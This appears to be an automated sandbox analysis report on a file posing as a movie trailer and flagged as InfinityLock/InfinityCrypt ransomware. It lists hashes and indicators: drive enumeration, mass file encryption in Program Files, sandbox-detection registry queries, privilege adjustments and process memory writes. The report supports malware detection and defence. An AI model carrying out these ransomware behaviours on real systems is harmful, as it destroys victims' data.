Analysis
-
max time kernel
503s -
max time network
511s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
29-02-2024 15:30
Static task
static1
Behavioral task
behavioral1
Sample
Super The Movie Trailer V3.mp4
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
Super The Movie Trailer V3.mp4
Resource
win10v2004-20240226-en
General
-
Target
Super The Movie Trailer V3.mp4
-
Size
117.8MB
-
MD5
7830eb596c36b6d017636363322f75bc
-
SHA1
176030c622a3dfb3f3a2f198714981014ecae284
-
SHA256
8058ae58304d110dfa1ca17154a806ae75de2d142a50eb3e92247736e7b1d8ea
-
SHA512
9d8f8ff3ce9230921cff7aa65cf315b91078a385084e5b2b10338793e0bcaab50463f5d158e066fd34fa6e1288f455011649f926d31d2df966d92f96dfad93fe
-
SSDEEP
3145728:zr/S87ZsdlRGhc+43/J782vU8zY4MktIEAJ3HX3oXe:zTS878lRsm7tdXAh3ee
Malware Config
Signatures
-
InfinityLock Ransomware
Also known as InfinityCrypt. Based on the open-source HiddenTear ransomware.
-
Enumerates connected drives 3 TTPs 23 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\E: unregmp2.exe File opened (read-only) \??\G: unregmp2.exe File opened (read-only) \??\I: unregmp2.exe File opened (read-only) \??\P: unregmp2.exe File opened (read-only) \??\R: unregmp2.exe File opened (read-only) \??\B: unregmp2.exe File opened (read-only) \??\N: unregmp2.exe File opened (read-only) \??\U: unregmp2.exe File opened (read-only) \??\W: unregmp2.exe File opened (read-only) \??\Z: unregmp2.exe File opened (read-only) \??\K: unregmp2.exe File opened (read-only) \??\O: unregmp2.exe File opened (read-only) \??\Q: unregmp2.exe File opened (read-only) \??\S: unregmp2.exe File opened (read-only) \??\A: unregmp2.exe File opened (read-only) \??\H: unregmp2.exe File opened (read-only) \??\J: unregmp2.exe File opened (read-only) \??\L: unregmp2.exe File opened (read-only) \??\M: unregmp2.exe File opened (read-only) \??\T: unregmp2.exe File opened (read-only) \??\V: unregmp2.exe File opened (read-only) \??\X: unregmp2.exe File opened (read-only) \??\Y: unregmp2.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 1 IoCs
flow ioc 184 camo.githubusercontent.com -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\illustrations_retina.png.67D2B1B89C2585D2EE67B417B476F92EA0D26D9FDAE7330325B07A2B54FBD49F Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\sv-se\ui-strings.js.67D2B1B89C2585D2EE67B417B476F92EA0D26D9FDAE7330325B07A2B54FBD49F Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\da-dk\ui-strings.js.67D2B1B89C2585D2EE67B417B476F92EA0D26D9FDAE7330325B07A2B54FBD49F Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\sv-se\ui-strings.js.67D2B1B89C2585D2EE67B417B476F92EA0D26D9FDAE7330325B07A2B54FBD49F Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\server_issue.gif.67D2B1B89C2585D2EE67B417B476F92EA0D26D9FDAE7330325B07A2B54FBD49F Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\uk-ua\ui-strings.js.67D2B1B89C2585D2EE67B417B476F92EA0D26D9FDAE7330325B07A2B54FBD49F Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\en-gb\ui-strings.js.67D2B1B89C2585D2EE67B417B476F92EA0D26D9FDAE7330325B07A2B54FBD49F Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\sv_get.svg.67D2B1B89C2585D2EE67B417B476F92EA0D26D9FDAE7330325B07A2B54FBD49F Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\root\ui-strings.js.67D2B1B89C2585D2EE67B417B476F92EA0D26D9FDAE7330325B07A2B54FBD49F Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\RHP_icons.png.67D2B1B89C2585D2EE67B417B476F92EA0D26D9FDAE7330325B07A2B54FBD49F Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_listview-hover.svg.67D2B1B89C2585D2EE67B417B476F92EA0D26D9FDAE7330325B07A2B54FBD49F Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\en-gb\ui-strings.js.67D2B1B89C2585D2EE67B417B476F92EA0D26D9FDAE7330325B07A2B54FBD49F Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\ca-es\ui-strings.js.67D2B1B89C2585D2EE67B417B476F92EA0D26D9FDAE7330325B07A2B54FBD49F Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\themes\dark\circle_2x.png.67D2B1B89C2585D2EE67B417B476F92EA0D26D9FDAE7330325B07A2B54FBD49F Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\css\main-selector.css.67D2B1B89C2585D2EE67B417B476F92EA0D26D9FDAE7330325B07A2B54FBD49F Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\ja-jp\ui-strings.js.67D2B1B89C2585D2EE67B417B476F92EA0D26D9FDAE7330325B07A2B54FBD49F Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\de-de\ui-strings.js.67D2B1B89C2585D2EE67B417B476F92EA0D26D9FDAE7330325B07A2B54FBD49F Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\themes\dark\icons.png.67D2B1B89C2585D2EE67B417B476F92EA0D26D9FDAE7330325B07A2B54FBD49F Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\fi-fi\ui-strings.js.67D2B1B89C2585D2EE67B417B476F92EA0D26D9FDAE7330325B07A2B54FBD49F Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\ru-ru\ui-strings.js.67D2B1B89C2585D2EE67B417B476F92EA0D26D9FDAE7330325B07A2B54FBD49F Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\1.3.185.17\msedgeupdateres_bn.dll.67D2B1B89C2585D2EE67B417B476F92EA0D26D9FDAE7330325B07A2B54FBD49F Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\1.3.185.17\msedgeupdateres_vi.dll.67D2B1B89C2585D2EE67B417B476F92EA0D26D9FDAE7330325B07A2B54FBD49F Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\over-arrow-navigation.svg.67D2B1B89C2585D2EE67B417B476F92EA0D26D9FDAE7330325B07A2B54FBD49F Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ko-kr\ui-strings.js.67D2B1B89C2585D2EE67B417B476F92EA0D26D9FDAE7330325B07A2B54FBD49F Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\js\nls\ui-strings.js.67D2B1B89C2585D2EE67B417B476F92EA0D26D9FDAE7330325B07A2B54FBD49F Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\zh-cn\ui-strings.js.67D2B1B89C2585D2EE67B417B476F92EA0D26D9FDAE7330325B07A2B54FBD49F Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\hr-hr\ui-strings.js.67D2B1B89C2585D2EE67B417B476F92EA0D26D9FDAE7330325B07A2B54FBD49F Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\MyriadPro-Regular.otf.67D2B1B89C2585D2EE67B417B476F92EA0D26D9FDAE7330325B07A2B54FBD49F Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\en-il\ui-strings.js.67D2B1B89C2585D2EE67B417B476F92EA0D26D9FDAE7330325B07A2B54FBD49F Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\nb-no\ui-strings.js.67D2B1B89C2585D2EE67B417B476F92EA0D26D9FDAE7330325B07A2B54FBD49F Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\acrobat_parcel_generic_32.svg.67D2B1B89C2585D2EE67B417B476F92EA0D26D9FDAE7330325B07A2B54FBD49F Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\libs\jquery.ui.touch-punch\0.2.2\jquery.ui.touch-punch.js.67D2B1B89C2585D2EE67B417B476F92EA0D26D9FDAE7330325B07A2B54FBD49F Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\en-gb\ui-strings.js.67D2B1B89C2585D2EE67B417B476F92EA0D26D9FDAE7330325B07A2B54FBD49F Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Download_on_the_App_Store_Badge_es_135x40.svg.67D2B1B89C2585D2EE67B417B476F92EA0D26D9FDAE7330325B07A2B54FBD49F Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\hu-hu\ui-strings.js.67D2B1B89C2585D2EE67B417B476F92EA0D26D9FDAE7330325B07A2B54FBD49F Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\it-it\ui-strings.js.67D2B1B89C2585D2EE67B417B476F92EA0D26D9FDAE7330325B07A2B54FBD49F Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\SaslPrep\SaslPrepProfile_norm_bidi.spp.67D2B1B89C2585D2EE67B417B476F92EA0D26D9FDAE7330325B07A2B54FBD49F Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\Close.png.67D2B1B89C2585D2EE67B417B476F92EA0D26D9FDAE7330325B07A2B54FBD49F Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\1.3.185.17\msedgeupdateres_is.dll.67D2B1B89C2585D2EE67B417B476F92EA0D26D9FDAE7330325B07A2B54FBD49F Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Comments.aapp.67D2B1B89C2585D2EE67B417B476F92EA0D26D9FDAE7330325B07A2B54FBD49F Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_checkbox_unselected_18.svg.67D2B1B89C2585D2EE67B417B476F92EA0D26D9FDAE7330325B07A2B54FBD49F Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\s_shared_single_filetype.svg.67D2B1B89C2585D2EE67B417B476F92EA0D26D9FDAE7330325B07A2B54FBD49F Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\sk-sk\ui-strings.js.67D2B1B89C2585D2EE67B417B476F92EA0D26D9FDAE7330325B07A2B54FBD49F Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\rhp_world_icon_2x.png.67D2B1B89C2585D2EE67B417B476F92EA0D26D9FDAE7330325B07A2B54FBD49F Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themeless\accessibility_poster.jpg.67D2B1B89C2585D2EE67B417B476F92EA0D26D9FDAE7330325B07A2B54FBD49F Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\Mac\ICELAND.TXT.67D2B1B89C2585D2EE67B417B476F92EA0D26D9FDAE7330325B07A2B54FBD49F Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\de\Microsoft.PowerShell.PackageManagement.resources.dll.67D2B1B89C2585D2EE67B417B476F92EA0D26D9FDAE7330325B07A2B54FBD49F Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\OptimizePDF_R_RHP.aapp.67D2B1B89C2585D2EE67B417B476F92EA0D26D9FDAE7330325B07A2B54FBD49F Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\fi-fi\ui-strings.js.67D2B1B89C2585D2EE67B417B476F92EA0D26D9FDAE7330325B07A2B54FBD49F Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\pl-pl\ui-strings.js.67D2B1B89C2585D2EE67B417B476F92EA0D26D9FDAE7330325B07A2B54FBD49F Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\bg_get.svg.67D2B1B89C2585D2EE67B417B476F92EA0D26D9FDAE7330325B07A2B54FBD49F Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\WelcomeCardRdr.png.67D2B1B89C2585D2EE67B417B476F92EA0D26D9FDAE7330325B07A2B54FBD49F Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\ar-ae\ui-strings.js.67D2B1B89C2585D2EE67B417B476F92EA0D26D9FDAE7330325B07A2B54FBD49F Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\en-il\ui-strings.js.67D2B1B89C2585D2EE67B417B476F92EA0D26D9FDAE7330325B07A2B54FBD49F Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\fr-ma\ui-strings.js.67D2B1B89C2585D2EE67B417B476F92EA0D26D9FDAE7330325B07A2B54FBD49F Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\review_shared.gif.67D2B1B89C2585D2EE67B417B476F92EA0D26D9FDAE7330325B07A2B54FBD49F Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_reportabuse-default_18.svg.67D2B1B89C2585D2EE67B417B476F92EA0D26D9FDAE7330325B07A2B54FBD49F Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_filter-disabled_32.svg.67D2B1B89C2585D2EE67B417B476F92EA0D26D9FDAE7330325B07A2B54FBD49F Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\sl-si\ui-strings.js.67D2B1B89C2585D2EE67B417B476F92EA0D26D9FDAE7330325B07A2B54FBD49F Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\plugins\editpdf-selector.js.67D2B1B89C2585D2EE67B417B476F92EA0D26D9FDAE7330325B07A2B54FBD49F Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\check-mark-2x.png.67D2B1B89C2585D2EE67B417B476F92EA0D26D9FDAE7330325B07A2B54FBD49F Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\en\Microsoft.PowerShell.PackageManagement.resources.dll.67D2B1B89C2585D2EE67B417B476F92EA0D26D9FDAE7330325B07A2B54FBD49F Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\DSCResources\MSFT_PackageManagement\ja-JP\MSFT_PackageManagement.schema.mfl.67D2B1B89C2585D2EE67B417B476F92EA0D26D9FDAE7330325B07A2B54FBD49F Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_newfolder_18.svg.67D2B1B89C2585D2EE67B417B476F92EA0D26D9FDAE7330325B07A2B54FBD49F Endermanch@InfinityCrypt.exe -
Checks processor information in registry 2 TTPs 10 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Endermanch@InfinityCrypt.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Endermanch@InfinityCrypt.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe -
Modifies registry class 5 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-275798769-4264537674-1142822080-1000\{469115AB-B5B4-49A2-BA2D-CCDC6A5E40E1} msedge.exe Key created \REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings OpenWith.exe Key created \REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings OpenWith.exe Key created \REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings OpenWith.exe Key created \REGISTRY\USER\S-1-5-21-275798769-4264537674-1142822080-1000_Classes\Local Settings OpenWith.exe -
Suspicious behavior: EnumeratesProcesses 20 IoCs
pid Process 1096 msedge.exe 1096 msedge.exe 3344 msedge.exe 3344 msedge.exe 3112 identity_helper.exe 3112 identity_helper.exe 4936 msedge.exe 4936 msedge.exe 1920 msedge.exe 1920 msedge.exe 1920 msedge.exe 1920 msedge.exe 1080 msedge.exe 1080 msedge.exe 4184 msedge.exe 4184 msedge.exe 4908 msedge.exe 4908 msedge.exe 5168 msedge.exe 5168 msedge.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 1280 OpenWith.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 21 IoCs
pid Process 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
description pid Process Token: SeShutdownPrivilege 4176 unregmp2.exe Token: SeCreatePagefilePrivilege 4176 unregmp2.exe Token: SeDebugPrivilege 3460 Endermanch@InfinityCrypt.exe Token: SeDebugPrivilege 6060 firefox.exe Token: SeDebugPrivilege 6060 firefox.exe Token: SeDebugPrivilege 6060 firefox.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe -
Suspicious use of SendNotifyMessage 37 IoCs
pid Process 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 3344 msedge.exe 6060 firefox.exe 6060 firefox.exe 6060 firefox.exe -
Suspicious use of SetWindowsHookEx 54 IoCs
pid Process 3532 OpenWith.exe 3532 OpenWith.exe 3532 OpenWith.exe 3532 OpenWith.exe 3532 OpenWith.exe 1280 OpenWith.exe 1280 OpenWith.exe 1280 OpenWith.exe 1280 OpenWith.exe 1280 OpenWith.exe 1280 OpenWith.exe 1280 OpenWith.exe 1280 OpenWith.exe 1280 OpenWith.exe 1280 OpenWith.exe 1280 OpenWith.exe 1280 OpenWith.exe 1280 OpenWith.exe 1280 OpenWith.exe 1280 OpenWith.exe 1280 OpenWith.exe 1280 OpenWith.exe 1280 OpenWith.exe 1280 OpenWith.exe 1280 OpenWith.exe 1280 OpenWith.exe 1280 OpenWith.exe 1280 OpenWith.exe 1280 OpenWith.exe 1280 OpenWith.exe 1280 OpenWith.exe 1280 OpenWith.exe 5980 OpenWith.exe 5980 OpenWith.exe 5980 OpenWith.exe 5980 OpenWith.exe 5980 OpenWith.exe 5980 OpenWith.exe 5980 OpenWith.exe 5980 OpenWith.exe 5980 OpenWith.exe 5980 OpenWith.exe 5980 OpenWith.exe 5980 OpenWith.exe 5980 OpenWith.exe 5980 OpenWith.exe 5980 OpenWith.exe 5980 OpenWith.exe 5980 OpenWith.exe 6060 firefox.exe 6060 firefox.exe 6060 firefox.exe 6060 firefox.exe 5748 OpenWith.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4084 wrote to memory of 4584 4084 wmplayer.exe 90 PID 4084 wrote to memory of 4584 4084 wmplayer.exe 90 PID 4084 wrote to memory of 4584 4084 wmplayer.exe 90 PID 4084 wrote to memory of 4788 4084 wmplayer.exe 92 PID 4084 wrote to memory of 4788 4084 wmplayer.exe 92 PID 4084 wrote to memory of 4788 4084 wmplayer.exe 92 PID 4788 wrote to memory of 4176 4788 unregmp2.exe 93 PID 4788 wrote to memory of 4176 4788 unregmp2.exe 93 PID 3344 wrote to memory of 3788 3344 msedge.exe 101 PID 3344 wrote to memory of 3788 3344 msedge.exe 101 PID 3344 wrote to memory of 2272 3344 msedge.exe 103 PID 3344 wrote to memory of 2272 3344 msedge.exe 103 PID 3344 wrote to memory of 2272 3344 msedge.exe 103 PID 3344 wrote to memory of 2272 3344 msedge.exe 103 PID 3344 wrote to memory of 2272 3344 msedge.exe 103 PID 3344 wrote to memory of 2272 3344 msedge.exe 103 PID 3344 wrote to memory of 2272 3344 msedge.exe 103 PID 3344 wrote to memory of 2272 3344 msedge.exe 103 PID 3344 wrote to memory of 2272 3344 msedge.exe 103 PID 3344 wrote to memory of 2272 3344 msedge.exe 103 PID 3344 wrote to memory of 2272 3344 msedge.exe 103 PID 3344 wrote to memory of 2272 3344 msedge.exe 103 PID 3344 wrote to memory of 2272 3344 msedge.exe 103 PID 3344 wrote to memory of 2272 3344 msedge.exe 103 PID 3344 wrote to memory of 2272 3344 msedge.exe 103 PID 3344 wrote to memory of 2272 3344 msedge.exe 103 PID 3344 wrote to memory of 2272 3344 msedge.exe 103 PID 3344 wrote to memory of 2272 3344 msedge.exe 103 PID 3344 wrote to memory of 2272 3344 msedge.exe 103 PID 3344 wrote to memory of 2272 3344 msedge.exe 103 PID 3344 wrote to memory of 2272 3344 msedge.exe 103 PID 3344 wrote to memory of 2272 3344 msedge.exe 103 PID 3344 wrote to memory of 2272 3344 msedge.exe 103 PID 3344 wrote to memory of 2272 3344 msedge.exe 103 PID 3344 wrote to memory of 2272 3344 msedge.exe 103 PID 3344 wrote to memory of 2272 3344 msedge.exe 103 PID 3344 wrote to memory of 2272 3344 msedge.exe 103 PID 3344 wrote to memory of 2272 3344 msedge.exe 103 PID 3344 wrote to memory of 2272 3344 msedge.exe 103 PID 3344 wrote to memory of 2272 3344 msedge.exe 103 PID 3344 wrote to memory of 2272 3344 msedge.exe 103 PID 3344 wrote to memory of 2272 3344 msedge.exe 103 PID 3344 wrote to memory of 2272 3344 msedge.exe 103 PID 